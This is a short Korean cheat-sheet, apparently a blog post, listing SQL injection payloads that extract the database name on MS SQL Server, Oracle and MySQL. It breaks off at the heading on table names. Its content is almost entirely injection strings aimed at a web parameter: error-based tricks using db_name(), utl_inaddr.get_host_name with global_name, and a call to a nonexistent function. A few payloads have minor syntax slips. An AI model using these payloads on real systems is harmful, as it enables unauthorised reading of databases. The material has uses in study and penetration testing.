[SQL Injection] DBMS별 데이터 베이스명 및 테이블 추출

** 데이터 베이스명 추출

- MS SQL Server

  db_name() 함수를 이용 

  ex) idx=1' and db_name>0--

- Oracle

  global_name 이용

  ex) idx=1' and utl_inaddr.get_host_name(select global_name from global_name) <>1-- 

- MySQL

  존재하지 않는 함수 이용

  ex) idx='1 and abc()>0#

** 테이블명 추출